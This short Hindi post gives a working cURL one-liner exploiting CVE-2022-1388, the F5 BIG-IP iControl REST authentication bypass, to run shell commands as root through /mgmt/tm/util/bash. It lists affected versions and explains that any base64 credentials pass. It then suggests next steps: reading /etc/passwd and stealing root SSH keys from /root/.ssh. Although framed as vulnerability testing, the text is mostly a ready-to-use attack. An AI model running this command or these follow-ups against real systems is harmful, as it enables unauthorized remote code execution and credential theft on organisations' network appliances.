
CVE-2022-1388 BIG-IP iControl REST RCE के परीक्षण के लिए cURL एक-लाइनर
F5 BIG-IP 16.1.x से पहले 16.1.2.2., 15.1.x से पहले 15.1.5.1, 14.1.x से पहले 14.1.4.6, 13.1.x से पहले 13.1.5, और सभी 12.1.x तथा 11.6.x संस्करणों पर, अघोषित अनुरोध iControl REST प्रमाणीकरण को बायपास कर सकते हैं।
इस भेद्यता का परीक्षण करने के लिए निम्नलिखित cURL वन-लाइनर का उपयोग करें।
curl -k --header "Host: 127.0.0.1" --header "Authorization: Basic YWRtaW46YWRtaW4=" --header "X-F5-Auth-Token: asdf" --header "Connection: X-F5-Auth-Token" --header "Content-Type: application/json" https://$IPADDRESS/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'
Authorization फ़ील्ड कोई भी base64 एन्कोडेड मान हो सकता है। उपरोक्त उदाहरण admin:admin का उपयोग करता है। इन्हें वैध क्रेडेंशियल होने की आवश्यकता नहीं है; यदि सर्वर भेद्य है तो कोई भी base64 एन्कोडेड मान काम करेगा।
यदि उपरोक्त कमांड ID लौटाता है, तो आप कई चीज़ें आज़मा सकते हैं, जैसे 'cat /etc/passwd' के साथ /etc/passwd पढ़ना, या 'cat /root/.ssh/identity' के साथ रूट SSH सर्टिफिकेट प्राप्त करने का प्रयास करें।